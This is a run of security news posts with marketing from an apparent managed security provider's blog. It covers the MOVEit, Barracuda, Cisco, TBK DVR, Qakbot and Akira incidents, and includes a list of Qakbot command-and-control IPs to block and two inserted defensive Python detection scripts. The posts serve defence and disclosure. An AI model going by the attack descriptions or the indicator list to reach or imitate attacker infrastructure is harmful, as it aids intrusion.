Are you prepared to fortify your organization’s cybersecurity defenses in alignment with the United States’ National Cybersecurity Strategy Implementation Plan? Protect your business from cyber threats and embrace proactive measures to safeguard your digital assets. Contact M.A. Polce today and secure your organization’s future with our expert cybersecurity solutions.

At M.A. Polce, we understand the critical importance of staying ahead of cyber adversaries in this rapidly evolving landscape. Our tailored cybersecurity services are designed to meet the unique needs of businesses like yours. With the White House’s focus on national cybersecurity, it’s the ideal time to ensure your organization is equipped to face any cyber challenge.

Let our team of certified experts assess your current security posture, identify vulnerabilities, and implement robust defenses. By partnering with M.A. Polce, you’ll gain access to industry-leading cybersecurity strategies and cutting-edge technologies to protect your valuable data and maintain your reputation.

Don’t wait for cyber threats to strike. Reach out to M.A. Polce today and join us in building a safer and more resilient digital ecosystem for your organization. Together, we’ll navigate the complexities of cybersecurity and create a stronger, more secure future for your business.

 

Overview of NYC DOE MOVEit Data Breach

MOVEit is file-transfer software that private companies and government agencies use to move documents and data securely. However, it was recently hacked, exposing the data of almost 45,000 students in New York City and of millions of people worldwide.

The released information includes social security numbers, OSIS numbers, dates of birth, and even employee IDs. Some documentation also includes student evaluations and related services progress reports, Medicaid reports for students receiving services, and internal records related to DOE employees’ leave statuses.

The amount of data leaked per person varies. City officials said they would notify those whose data was compromised on an unspecified date this summer.

The NYC Department of Education’s Response

On a Sunday following the end of the school year, the New York City Department of Education released a statement about the attack.

“The safety and security of our students and staff, including their personal information and data, is of the utmost importance for the New York City Department of Education. Our top priority is determining exactly which confidential information was exposed and the specific impact for each affected individual,” the department said.

As the release of sensitive information positions victims to be subject to fraudulent activity, the DOE has offered victims access to an identity monitoring service.

After discovering the intrusion, the NYC DOE patched the flaw and took the affected servers offline. Alongside those efforts, the NYC DOE is working with NYC Cyber Command to respond to the incident. Additionally, the DOE is cooperating with local and federal law enforcement agencies to investigate it.

Who is responsible for the MOVEit ransomware attack on the DOE?

Sources suspect the attack was conducted by CL0P, a ransomware gang with pro-Russian ties. In fact, the gang has claimed responsibility for the MOVEit data-theft attacks in a statement shared directly with BleepingComputer in early June 2023.

A noteworthy aspect of this story is that the CL0P threat actors did not immediately use the stolen data to extort NYC DOE victims. So far, CL0P has not published any DOE information, nor has the group made threats or demanded payment. Most likely, the group is still sifting through the files to determine what is most valuable to them.

Other MOVEit Data Breaches

The NYC DOE breach is merely one addition to the already extensive list of breaches the gang has carried out. Compared with the other organizations affected through the same file transfer software, the NYC DOE breach is relatively small in scale. What is most notable about this case is that the personal information of minors is involved.

CL0P claimed to have breached the servers of “hundreds of companies,” including the largest US pension fund, CalPERS, and the insurer Genworth Financial. Attackers reached both organizations through a third-party vendor, PBI Research Services. Counting those attacks and others, the number of MOVEit hack victims had grown by several million by late June.

In previous CL0P attacks, the group emailed their extortion demands to company executives.

Extortion email sent by CL0P during Accellion attacks.

With those affected by the MOVEit Transfer attacks, however, CL0P is taking a different approach. Instead of sending ransom demands, CL0P is asking affected organizations to contact the group themselves if they wish to negotiate a ransom.

The CL0P Ransomware Group

According to a joint Cybersecurity Advisory from CISA, open-source information indicates that CL0P (also known as TA505) began exploiting a previously unknown SQL injection vulnerability (CVE-2023-34362) on May 27, 2023. The flaw is in Progress Software’s managed file transfer (MFT) solution, MOVEit Transfer. Once exploited, the group infected internet-facing MOVEit Transfer web applications with a web shell named LEMURLOOT, which was then used to steal data from the underlying MOVEit Transfer databases.

The CL0P ransomware group has a habit of operating on holidays. This is significant because holidays typically mean fewer staff members on the clock, making them an opportune time to attack without being noticed.

How to Defend Against Ransomware

If you become a victim of ransomware and/or extortion, experts strongly advise that you never pay to get your data back. If your data is stored encrypted, it will be more difficult for the threat actor to view it and use it against you. Moreover, paying encourages the attackers, and others like them, to do it again.

In summary, organizations need to protect their most crucial assets. While there is no foolproof way to eliminate all cyber risks, you can mitigate most of them with basic security initiatives. Options include maintaining a patch schedule and regularly completing vulnerability assessments.

If your organization could use assistance implementing cybersecurity or managing cyber risk, consider partnering with a cybersecurity company like M.A. Polce. As a managed security services provider (MSSP) with industry-leading Managed Detection and Response capabilities, we can help protect your organization from cyber threats like ransomware. You can contact us today to discuss your needs.

Overview – Custom Malware Infects Barracuda ESG

Using a zero-day vulnerability exploited since 2022, threat actors have been infecting Barracuda’s Email Security Gateway (ESG) with custom malware. Barracuda Networks, whose email security appliances are installed in over 200,000 organizations around the world, has released an update to patch the zero-day. However, the fix comes at least seven months after threat actors began exploiting the vulnerability, during which time cybercriminals were able to backdoor customers through the ESG.

History of the Barracuda ESG Zero-Day

The bug, tracked as CVE-2023-2868, was part of an ongoing investigation Barracuda initiated in October 2022. The investigation shows that threat actors were able to gain access to a “subset of ESG appliances” and then deploy backdoors that gave them persistent access to the compromised systems and let them steal information from the ESG appliances.

Initially, the security flaw was discovered on May 19th, the day after Mandiant, a cybersecurity firm, began digging into the suspicious activity. Then on May 20th, Barracuda released and applied a patch to all ESG appliances. The patch blocks the attackers’ access to the compromised devices using a dedicated script. On May 24th, Barracuda warned customers that their ESG appliances might have been breached using the now-patched zero-day bug. The warning advised customers to investigate their environment to ensure that no threat actors were moving laterally throughout the network.

Custom Malware Used in ESG Zero-Day Attacks

As mentioned, these attacks involve custom malware. The first strain, named Saltwater, is a trojanized Barracuda SMTP daemon (bsmtpd) module that gives attackers a backdoor into infected appliances. Saltwater can also execute commands on compromised devices, transfer files, and proxy or tunnel the attacker’s malicious traffic to avoid detection.

The second strain found during the investigation is called SeaSpy, which is activated by “magic packets.” This malware monitors port 25 (SMTP) traffic, and some of its code overlaps with the publicly available cdoor passive backdoor. SeaSpy also establishes reverse shells via SMTP HELO/EHLO commands sent from the malware’s command-and-control (C2) server. Indicators of compromise (IOCs) can be found on Barracuda’s website.

What Should Barracuda ESG Users Do to Stay Secure?

In summary, we advise users of Barracuda Email Security Gateway appliances to check that their ESG appliances are up to date and, of equal importance, to stop using any breached appliance. Users with affected devices should request a new virtual or hardware appliance, rotate credentials linked to the hacked appliances, and check network logs for IOCs and connections from unknown IP addresses. Barracuda notes that impacted users have been notified of the actions to take via the ESG. To keep up with patches in the future, we recommend staying current on vendor communications for the applications in your environment.

A Solution to Managing Your Organization’s Security

As cyber threats become more complex and frequent, it’s crucial for organizations to prioritize cybersecurity. However, limited resources often make it difficult for small and medium-sized businesses (SMBs) to manage their security effectively. That’s why partnering with a Managed Security Service Provider (MSSP) like M.A. Polce can be a strategic business initiative for SMBs. MSSPs have the expertise and resources to handle critical security practices, such as patch management and network monitoring. By outsourcing these tasks, organizations can focus on their core business objectives while ensuring their security posture is strong and up to date. If your organization could use assistance managing its cybersecurity, contact us today. We’ll evaluate your needs and customize a solution that fulfills them.

Sources

https://www.barracuda.com/company/legal/esg-vulnerability#:~:text=the%20section%20below.-,Endpoint%20IOCs,-Table%204%20lists – Barracuda’s released IOCs
https://www.securityweek.com/barracuda-zero-day-exploited-to-deliver-malware-for-months-before-discovery/
https://www.bleepingcomputer.com/news/security/barracuda-warns-of-email-gateways-breached-via-zero-day-flaw/
https://www.bleepingcomputer.com/news/security/barracuda-zero-day-abused-since-2022-to-drop-new-malware-steal-data/

Overview of Apple’s Rapid Security Response Update

Last Thursday, Apple released a Rapid Security Response update. Rapid Security Responses are a relatively new type of software release that exists to “deliver important security improvements between software updates.” As a result, users now get security fixes more frequently, mitigating security risks in near real time.

Apple’s first Rapid Security Response fixes two actively exploited zero-day vulnerabilities in Apple WebKit. The two bugs, CVE-2023-28204 and CVE-2023-32373, were reported to the company by an anonymous researcher. They can lead to sensitive information disclosure and arbitrary code execution if an attacker tricks a victim into processing specially crafted web content. In other words, the attacker must first lure the target to a malicious site; once triggered, the attacker gains access to the victim’s device and files and can run further malicious code to steal data.

Devices Affected by Apple’s Rapid Security Response Updates

Apple’s security advisory states that it patched the vulnerabilities with its first Rapid Security Response updates, specifically iOS 16.4.1 (a), iPadOS 16.4.1 (a), and macOS 13.3.1 (a). The newest updates, iOS 16.5 and iPadOS 16.5, fix CVE-2023-28204 and CVE-2023-32373 as well as CVE-2023-32409. The latter is a WebKit zero-day that attackers exploit to escape the Web Content sandbox.

CVE-2023-32409 was reported to Apple by Google’s Threat Analysis Group and Amnesty International. The group’s work indicates that the vulnerability was most likely already exploited by the products of a commercial spyware vendor.

The updates also resolve exploited WebKit vulnerabilities in Apple TV, Apple Watch, and Safari. As for the latest macOS Ventura update, three zero-day bugs and almost 50 other vulnerabilities have been fixed. Many could have led to sensitive information disclosure, arbitrary code execution, DoS attacks, a security feature bypass, and privilege escalation.

Summary of Apple’s Rapid Security Response Updates

Fortunately, Apple’s latest Rapid Security Response update also patches over thirty additional vulnerabilities. Several of these lead to security bypass, sandbox escape, arbitrary code execution, exposure of location and other user data, privilege escalation, termination of an application, recovery of deleted photos, retained access to system configuration files, contact information exposure from the lock screen, and modification of protected parts of the file system. The length of this list makes it all the more critical to update your Apple device to the latest version if you have not done so already.

How to Prevent Exploitation of Apple Device Vulnerabilities

It is always essential to install new updates for your devices as soon as they are released, and this is especially true for Rapid Security Response updates. Turning on automatic updates is an excellent way to stay on top of it: updates can then be installed overnight without manual effort.

Steps to Update Your Apple Devices

How to Set Automatic Updates on an iPhone or iPad

Go to Settings > General > Software Update > Automatic Updates, then turn on “Security Responses & System Files.”

How to Set Automatic Updates on a Mac

Choose Apple menu > System Settings. Click General in the sidebar, then click Software Update on the right. Click the Show Details button next to Automatic Updates. Then turn on “Install Security Responses and system files.”

Managed Cybersecurity Services to Secure Your Organization

If your organization needs help managing device security or its overall security posture, contact us about our managed security services today. We specialize in cybersecurity and risk management services for small to medium-sized businesses and public entities across New York State. As a leading provider of IT security solutions in the area, we provide exceptional support, customizable solutions, and the assurance of a trusted technology partner.

Sources

https://www.securityweek.com/apple-patches-3-exploited-webkit-zero-day-vulnerabilities/
https://www.securityweek.com/apple-patches-actively-exploited-webkit-zero-day-vulnerability/
https://support.apple.com/en-us/HT201224 – Apple’s Update on Rapid Security Response Update

Overview of .zip Top-Level Domain Cyber Threat

At the beginning of May, Google introduced eight new top-level domains (TLDs) available for purchase for websites and email addresses, including .zip. A top-level domain is the first label after the DNS root zone, or, in other words, whatever follows the final period in a domain name; think of .com, .edu, or .org. Recent observations of malicious use of the .zip TLD have raised concern among cybersecurity experts.

The concern is that the .zip domain is indistinguishable from the popular .zip file extension. Messaging platforms and social media sites automatically convert text that looks like a hostname into a clickable link, so a file name ending in .zip mentioned in a message becomes a link to a domain under the .zip TLD. Because URLs are routinely used to download files, clicking such a link can lead to a malware download instead of the file the user expected.

Malicious use of the .zip top-level domain is already active in the wild. In one instance, a phishing page disguised as a file with the domain “microsoft-office[.]zip” attempts to steal Microsoft Account credentials.

Example of phishing with the .zip Top-Level Domain

Theoretically, a threat actor can purchase a .zip domain with the same name as a commonly used filename, such as “update.zip.” Then, the attacker can deploy the .zip domain in a targeted phishing email. When clicked, it redirects an unsuspecting victim to a malware download instead of the update they intended to install.

How to Protect Against New .zip TLD Threats

At this time, the best way users can protect against this threat is through awareness. For this reason, experts recommend providing employees with security awareness training. Quality cyber awareness training programs entail simulated phishing campaigns that test employees with what could be real-life situations. Because these activities familiarize employees with realistic cyber threats, it’s an effective way to prevent cyber incidents within an organization.

Another option is to put a related security control in place. Experts highly recommend assessing whether your organization needs to allow access to .zip domains at all. If there is no business need for accessing or using these new TLDs, block them at the network firewall, DNS, or web proxy level and allowlist specific domains as needed.
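As an added example (not from the original post or any vendor), the Python script below shows both the auto-link ambiguity described above and the block-unless-allowlisted policy: it extracts the hostnames a chat or mail client would turn into links from a constructed message, treats .zip (and .mov, another of the eight new TLDs that doubles as a file extension) as risky, and blocks them unless the host or a parent domain is allowlisted. The link regex and the sample message are assumptions of the example.

```python
"""Added example: flag .zip-style hostnames in message text and apply the
block-unless-allowlisted policy recommended above.

Assumptions: the regex approximates how chat and mail clients auto-link
hostname-looking text; RISKY_TLDS covers .zip and .mov, two of the eight
TLDs Google opened in May 2023 that double as common file extensions.
"""
from __future__ import annotations

import re

RISKY_TLDS = {"zip", "mov"}

# Optional scheme, then one or more dotted labels and an alphabetic TLD.
# An optional port and path are consumed too, so a file name at the end of
# a URL path (.../update.zip) is not mistaken for a separate host.
_LINK_RE = re.compile(
    r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(?::\d+)?(?:/[^\s]*)?",
    re.IGNORECASE,
)


def refang(text: str) -> str:
    """Undo the defanging used in threat reports (microsoft-office[.]zip)."""
    return text.replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http")


def extract_hosts(text: str) -> list[str]:
    """Return the hostnames a client would render as clickable links."""
    return [m.group(1).lower() for m in _LINK_RE.finditer(refang(text))]


def decide(host: str, allowlist: set[str]) -> str:
    """Block hosts under a risky TLD unless the host or a parent domain is allowlisted."""
    labels = host.split(".")
    if labels[-1] not in RISKY_TLDS:
        return "allow"
    for i in range(len(labels) - 1):  # stops before the bare TLD
        if ".".join(labels[i:]) in allowlist:
            return "allow"
    return "block"


def classify_links(text: str, allowlist: set[str] | None = None) -> list[tuple[str, str]]:
    """Pair every auto-linkable host in `text` with the policy verdict for it."""
    allowlist = allowlist or set()
    return [(host, decide(host, allowlist)) for host in extract_hosts(text)]


# Constructed phishing-style message (not a real sample).
SAMPLE_MESSAGE = (
    "Please install the attached update.zip, or fetch it from "
    "https://downloads.example.com/update.zip. Questions: see "
    "microsoft-office[.]zip or intranet.corp.zip, and the demo in quarterly.mov."
)

if __name__ == "__main__":
    # "corp.zip" stands in for a domain the organization has deliberately allowlisted.
    for host, verdict in classify_links(SAMPLE_MESSAGE, {"corp.zip"}):
        print(f"{verdict:5}  {host}")
```

Note that the bare token update.zip is flagged while the same file name at the end of the https://downloads.example.com URL is not, which is exactly the distinction a mail or chat client fails to make.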

Cybersecurity threats are constantly evolving. This makes it vital to maintain awareness of the cyber landscape so you can take prompt and effective actions to secure your environment. If your organization needs assistance managing its cybersecurity, contact us today. We offer comprehensive managed cybersecurity services for small and medium-sized businesses to help them assess, strengthen, and actively defend their cyber posture.

Sources

https://www.blog.google/products/registry/8-new-top-level-domains-for-dads-grads-tech/
https://www.bleepingcomputer.com/news/security/new-zip-domains-spark-debate-among-cybersecurity-experts/
Arctic Wolf Security Bulletin (email)

Overview of Cisco Critical Switch Bugs

A recent Cisco security advisory warns customers of four new bugs affecting multiple Small Business Series Switches. These vulnerabilities allow remote code execution, and public exploit code is available. All four have CVSS base scores of 9.8 out of 10, making them critical. Successful exploitation allows unauthenticated attackers to execute arbitrary code with root privileges on the compromised device.

Details on Cisco Critical Switch Bugs

Tracked as CVE-2023-20159, CVE-2023-20160, CVE-2023-20161, and CVE-2023-20189, all four are caused by improper validation of requests sent to the targeted switches’ web interface. An attacker can exploit them by sending crafted requests to a device’s web-based user interface. These are low-complexity attacks that require no user interaction.

While there are no workarounds to address these vulnerabilities, Cisco has released free software updates for them.

Cisco explained that the vulnerabilities are not dependent on one another. In other words, the exploitation of one of the vulnerabilities is not required to exploit the other. Also, a software release affected by one of the vulnerabilities may not be affected by the others.

Cisco Small Business Switches Affected by Critical Bug

  • 250 Series Smart Switches, 350 Series Managed Switches, 350X Series Stackable Managed Switches, and 550X Series Stackable Managed Switches (fixed in firmware version 2.5.9.16)
  • Business 250 Series Smart Switches and Business 350 Series Managed Switches (fixed in firmware version 3.3.0.16)
  • Small Business 200 Series Smart Switches, Small Business 300 Series Managed Switches, Small Business 500 Series Stackable Managed Switches (no patch available at the moment)

 
For the last bullet above, no patch is available for the affected devices since these have all entered the end-of-life process.

Cisco’s Product Security Incident Response Team revealed that proof-of-concept exploit code is available for these vulnerabilities. Consequently, active exploitation is possible if a motivated threat actor builds on that code and targets vulnerable devices.

Cisco Products Confirmed Not Vulnerable

  • 220 Series Smart Switches
  • Business 220 Series Smart Switches

 

The Importance of Patching Device Vulnerabilities

Staying on top of vulnerabilities and patches for all devices in your organization is crucial. After all, ignoring this can lead to security breaches with dire consequences for individuals and the company. Hackers are constantly finding new ways to exploit weaknesses in technology, so it’s important to stay informed and protect your devices. By and large, regularly updating and patching devices significantly reduces the risk of a security breach and keeps your data safe. For this reason, we encourage you to be proactive and vigilant about device security to ensure a safer digital world.

If you struggle to keep up with the latest vulnerabilities and patches for devices in your organization, consider partnering with a managed security service provider (MSSP) like M.A. Polce. Partnering with an MSSP can take the burden off your shoulders and ensure your devices are always up to date and secure. Our experts stay informed on the latest security threats and have the tools to patch vulnerabilities quickly. Contact M.A. Polce today to learn more about how we can assist with your patch management needs.

Sources

https://www.bleepingcomputer.com/news/security/cisco-warns-of-critical-switch-bugs-with-public-exploit-code/
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sg-web-multi-S9g4Nkgv – Cisco’s Update
https://www.cisco.com/c/en/us/products/collateral/switches/small-business-smart-switches/eos-eol-notice-c51-740541.html – Cisco’s End of Life Release

Overview of Patch Tuesday’s Sysmon Vulnerability

During Microsoft’s latest Patch Tuesday, the company released a security advisory describing a local privilege escalation vulnerability in Sysmon. An independent security researcher discovered the vulnerability and reported it to Microsoft. While it is currently considered a low-risk vulnerability, Microsoft has released Sysmon version 14.16 to fix the flaw, and users should install it.

Sysmon Vulnerability Details

The vulnerability exists because Sysinternals Sysmon for Windows improperly imposes security restrictions. As a result, threat actors can bypass those restrictions and escalate privileges within the environment. Rather than serving as an initial entry point into a system, the vulnerability is expected to be leveraged by malicious actors to escalate privileges on a system they have already compromised.

As mentioned, this is considered a low-risk vulnerability. Its CVSS base score is 7.8, and exploitation is possible. Although no proof-of-concept exploit is publicly available, Microsoft recommends upgrading your devices to the latest available version of Sysmon. This version, Sysmon 14.16, should be added to your next patching schedule to minimize the chances of local privilege escalation.

In order to perform the Sysmon update, please see the Sysmon Installation guide provided by Arctic Wolf here.

How to Protect Your Organization from Cyber Vulnerabilities

As always, it’s important to pay attention to new vulnerabilities and potential risks within your environment so you can take the necessary mitigation steps. This is especially true for zero-days, which are often disclosed on Patch Tuesday. Applying updates promptly and maintaining a sense of urgency when dealing with vulnerabilities will help keep you and your organization protected in the long run.

If your organization needs assistance managing its cyber risk, consider partnering with a managed security service provider (MSSP) like M.A. Polce. We offer customizable cybersecurity services that actively defend your network from cyber threats, as well as managed risk and compliance services to help you assess and strengthen your security posture. Contact us to learn more about our cybersecurity solutions for businesses.

Sources

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29343 – Microsoft Updates
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon – Sysmon Download
https://arcticwolf.com/resources/blog/cve-2023-29343-sysmon-local-privilege-escalation-vulnerability/ – Arctic Wolf blog

Overview of Recent Qakbot Malware Attacks

Sources confirm a recent increase in Qakbot malware attacks used for initial access to gain a foothold in environments. Over the last decade, Qakbot has built a name for itself as one of the deadliest trojans in the wild. It originated as a banking trojan in 2007, but Qakbot (also known as QBot, QuackBot, and Pinkslipbot) continues to evolve with new techniques and capabilities.

QBot infects victims through several attack vectors. Phishing emails distribute QBot, and once inside a network it self-propagates and steals sensitive data. It commonly provides remote code execution, which lets threat actors carry out hands-on attacks to achieve secondary objectives, including scanning the compromised network or deploying ransomware.

In QBot’s latest iteration, sources report that it uses compromised, trusted websites belonging to small businesses to serve the malware after phishing users via email, which bypasses email link-scanning services. Unsuspecting victims then download a zip file containing Windows Script Files (.wsf) or JavaScript (.js) files that load the Qakbot malware. The loader has also been observed performing its usual injection into wermgr.exe to call out to command and control. After initial access, the threat actor can reach other machines and call out via Cobalt Strike beacons over HTTPS using rundll32.exe.

How to Protect Against Qakbot Malware

To mitigate the threat of Qakbot malware, be wary of zip archives that contain JavaScript or Windows Script Files disguised as invoices or other documents. It is also critical to block the Indicators of Compromise (IoCs) associated with Qakbot at your firewall and DNS. These Qakbot servers have been observed listening on remote port 65400.

The following table lists the IP addresses and DNS names to block to mitigate the Qakbot threat:

IP Address          DNS
172.107.98[.]3      unassigned.psychz[.]net
23.111.114[.]52     N/A
94.103.85[.]86      v1785516.hosted-by-vdsina[.]ru
99.228.131[.]116    cpef02f74c848b8-cm30b7d4b9e4d0.sdns.net.rogers[.]com
47.205.25[.]170     N/A
79.47.207[.]6       host-79-47-207-6.retail.telecomitalia[.]it

Other Mitigations for Qakbot Malware Attacks:

  • Disable the Windows Script Host (wscript.exe) if no software on the machine uses it
  • Block outbound communication to remote port 65400 at the firewall
  • Geoblock outbound connections at the firewall (which may interfere with legitimate software)
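
The advice above to watch for zip archives carrying .wsf or .js files can be turned into a gateway-side check. The following is an added example, not code from the original advisory or any vendor: it lists every script loader inside a zip archive (one level of nested zip included) and flags loaders hiding behind a document-looking double extension such as "Invoice.pdf.js". The lure extensions and all sample archives are this example's own constructed assumptions.

```python
"""Triage zip attachments for the script loaders Qakbot phishing uses."""
import io
import zipfile
from typing import Dict, List, Tuple

LOADER_EXTENSIONS = (".wsf", ".js")  # script types named in the advisory
# Assumed set of document extensions used to dress up a loader ("Invoice.pdf.js").
LURE_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")


def script_entries(archive_bytes: bytes, depth: int = 0) -> List[Tuple[str, str]]:
    """Return (member_name, reason) for each risky member of a zip archive.

    reason is "loader" for a bare .wsf/.js file, "lure" when the script carries
    a document extension in front of the real one, and "unreadable nested zip"
    when an inner archive cannot be opened. Nested zips are opened one level deep.
    """
    findings: List[Tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            lower = name.lower().rstrip()  # trailing spaces can hide the extension
            if lower.endswith(LOADER_EXTENSIONS):
                stem = lower.rsplit(".", 1)[0]
                reason = "lure" if stem.endswith(LURE_EXTENSIONS) else "loader"
                findings.append((name, reason))
            elif lower.endswith(".zip") and depth < 1:
                try:
                    inner = script_entries(zf.read(info), depth + 1)
                except zipfile.BadZipFile:
                    findings.append((name, "unreadable nested zip"))
                    continue
                findings.extend((f"{name}/{m}", r) for m, r in inner)
    return findings


def should_quarantine(archive_bytes: bytes) -> bool:
    """Policy hook: hold any archive that carries a script loader at all."""
    try:
        return bool(script_entries(archive_bytes))
    except zipfile.BadZipFile:
        return True  # a corrupt "zip" from an unknown sender is not worth delivering


def build_sample(members: Dict[str, bytes]) -> bytes:
    """Constructed helper: build an in-memory zip from {member_name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed samples: a clean invoice, a double-extension lure, a nested zip.
    samples = {
        "benign": build_sample({"invoice_2023-05.pdf": b"%PDF-1.4 constructed placeholder"}),
        "lure": build_sample({"Invoice.pdf.js": b"// constructed placeholder, not a loader"}),
        "nested": build_sample({"docs.zip": build_sample({"Scan.wsf": b"<job/>"})}),
    }
    for label, blob in samples.items():
        verdict = "quarantine" if should_quarantine(blob) else "deliver"
        print(label, script_entries(blob), verdict)
```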

Cybersecurity Services to Protect Against Malware

M.A. Polce is an IT and cybersecurity company in New York that specializes in providing comprehensive, customizable cybersecurity services. We protect businesses from cyber threats like QBot Malware using a combination of human expertise and advanced technologies. So, if your organization needs assistance managing the security of its IT, contact us today to learn about our managed cybersecurity services. 

Sources

Blackpoint Cyber’s Cyber Threat Notice

https://www.digitaljournal.com/tech-science/new-cyberthreat-in-the-horizon-qakbot-malware/article

https://www.galvnews.com/news_ap/business/april-2023-s-most-wanted-malware-qbot-launches-substantial-malspam-campaign-and-mirai-makes/article_3365bf68-1e4f-5c40-bdbe-f94a6d4e8a5b.html

https://informationsecuritybuzz.com/abb-struck-black-basta-ransomware/

https://www.cyber.nj.gov/alerts-advisories/2023-q1-qbot-trend-analysis

https://www.datto.com/blog/qbot-malware-what-is-it-and-how-does-it-work

Overview of Akira Ransomware

A new ransomware operation named Akira has compiled a list of victims across industries such as education, finance, real estate, manufacturing, and consulting. In the two months since its launch, Akira has claimed attacks on at least sixteen companies, and counting, according to BleepingComputer. The operation’s primary focus is to breach corporate networks worldwide, encrypt files, and demand millions of dollars in ransom.

Due to code differences, experts believe that this new Akira operation is unrelated to a former ransomware strain with the same name active in 2017.

How Akira Ransomware Works

Akira uses a simple technique that can easily take down a company or organization by encrypting its files. The ransomware runs a PowerShell command that deletes the Windows Shadow Volume Copies on the device. Once that command succeeds, the ransomware starts encrypting files on the device with over 150 different file extensions. During encryption it skips any files found in the Recycle Bin, System Volume Information, Boot, ProgramData, and Windows folders, as well as files ending in .exe, .lnk, .dll, .msi, and .sys. Encrypted files receive the .akira extension at the end of the file name, for example “example.doc.akira” or “example.jpg.akira”.

Akira also uses the Windows Restart Manager API to shut down Windows services or close processes that keep a file open, so that the file can be encrypted. Each folder on the computer receives a ransom note named “akira_readme.txt”, which explains how the files were taken over and encrypted and links to the Akira data leak site and to a negotiation site where the ransom is paid. Each victim has a unique negotiation password that can be entered on Akira’s Tor site on the dark web, which leads to a chat system where the victim can negotiate with the ransomware group.

[Image: sample Akira ransom note on the group’s data leak site. Source: BleepingComputer]

How and Why Akira Steals Corporate Data

Once it successfully breaches a network, Akira spreads laterally to other devices within the organization. Once the group obtains the organization’s Windows domain admin credentials, it deploys the ransomware throughout the network, but not before stealing corporate data for leverage. Akira uses the stolen data to extort the company: the group threatens to release the information publicly if a ransom is not negotiated and paid.

Akira has already leaked the data of four victims on its data leak site. The leaks range from 5.9 GB to 259 GB, while ransom demands range from $200,000 to a few million dollars. In some cases, companies do not need their files decrypted and solely want to protect the confidentiality of their information; where decryption is not needed, ransom demands have been lowered but not removed entirely. Because Akira is relatively new, researchers are still monitoring it for weaknesses.

How to Protect Your Organization from Akira Ransomware

You can help protect your organization from Akira Ransomware similarly to how you would from other cyber threats. A few basic best cybersecurity practices include:

  • Practice good IT hygiene
  • Back up your data on a regular basis
  • Invest in security awareness training for yourself and your employees
  • Ensure applications, software, and appliances are up to date and patched

As a Managed Security Service Provider (MSSP) in New York State, M.A. Polce specializes in providing comprehensive, customizable cybersecurity services to protect businesses from cyber threats like Akira Ransomware. If your organization needs assistance managing IT security, contact us today.

Sources

https://www.bleepingcomputer.com/news/security/meet-akira-a-new-ransomware-operation-targeting-the-enterprise/ – see the example ransom note here
https://thecyberexpress.com/mcgregor-cyber-attack-akira-ransomware-group/
https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/

Overview – Attacks on TBK Vision’s DVR Vulnerability

Last month, there was a massive surge in malicious attacks targeting a five-year-old vulnerability in TBK Vision’s DVR camera system. A Digital Video Recorder (DVR) is the central part of a security surveillance system because, without it, one would be unable to review the recorded footage. DVR servers store sensitive security footage and are typically located on the company’s internal network to prevent unauthorized users from accessing the footage.

The vulnerability, CVE-2018-9995, is a high-severity flaw discovered by security researchers at Fortinet. It stems from an error in how the device handles a malicious HTTP cookie, which enables a remote attacker to bypass authentication and obtain administrative privileges, returned in the form of JSON data. Once that happens, the attacker can view camera footage and video feeds. Threat actors are using a publicly available proof-of-concept (PoC) exploit to target the vulnerability.

Last month, over 50,000 attack attempts against these devices were recorded as unique Intrusion Prevention System (IPS) detections. The rise in attacks led Fortinet to call attention to the flaw. However, details of the vulnerability trace back to April 2018, and because no patch was ever released, the devices have been left wide open and vulnerable.

Banking, retail, government, and other sectors use TBK Vision’s products worldwide. The wide use of these devices and their easy-to-exploit nature makes the vulnerability a popular target for attackers.

Devices Impacted by the TBK DVR Vulnerability

This vulnerability affects the TBK DVR 4104 and TBK DVR 4216 models and any rebrands of this model under the Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR brands.

What to do if You Use Vulnerable TBK DVR Devices

To date, no patch exists for the flaw, so the recommendation is to replace the vulnerable devices listed above with a new, supported model, or to isolate them from the internet within your environment to restrict unauthorized access. For any other devices you use, the most crucial factor in protecting them, especially internet-facing devices, is to patch and install updates. Enabling automatic updates where a device offers them ensures it stays on the latest version. If you need help managing the security of your devices, contact us to learn about your options.

Sources

https://tbkvision.com/

https://www.infosecurity-magazine.com/news/high-severity-flaw-tbk-dvr-camera/

https://www.bleepingcomputer.com/news/security/hackers-exploit-5-year-old-unpatched-flaw-in-tbk-dvr-devices/

https://www.securityweek.com/exploitation-of-5-year-old-tbk-dvr-vulnerability-spikes/

https://nvd.nist.gov/vuln/detail/CVE-2018-9995

Overview – New Security Updates for VMware Products

A recent VMware announcement contains security updates for various flaws found in the company’s products. The security vulnerabilities impact VMware Workstation Pro/Player and VMware Fusion. All flaws were privately reported to VMware.

VMware Zero-Day Security Updates

Two of these flaws are zero-day vulnerabilities known as CVE-2023-20869 and CVE-2023-20870. They were initially part of an exploit chain that STAR Labs security researchers demonstrated during the Pwn2Own Vancouver 2023 hacking contest. The vulnerabilities allow attackers to gain code execution on systems running unpatched versions of the VMware Workstation and VMware Fusion hypervisors.

The first, CVE-2023-20869, is a stack-based buffer overflow in the Bluetooth device-sharing functionality that allows a local attacker to execute code as the VMware VMX process.

The second, CVE-2023-20870, is an information disclosure weakness in the same Bluetooth device-sharing functionality; it enables an attacker inside the VM to read privileged information from hypervisor memory. To remove the attack vector for both vulnerabilities, turn off Bluetooth support for the VM by unchecking the “Share Bluetooth devices with the virtual machine” option on any impacted device.

Other VMware Product Updates

Additionally, VMware’s announcement addresses two more security flaws affecting the VMware Workstation and Fusion hosted hypervisors.

One of these, CVE-2023-20871, is a high-severity VMware Fusion raw disk vulnerability. It enables an attacker with read/write access to the host operating system to escalate privileges locally and gain root access on the host OS.

Finally, the last of the four bugs is CVE-2023-20872, an out-of-bounds read/write vulnerability in the SCSI CD/DVD device emulation that affects both VMware Workstation and VMware Fusion. In this case, exploitation can be blocked temporarily by removing the CD/DVD device from the virtual machine or by configuring the virtual machine not to use a virtual SCSI controller.

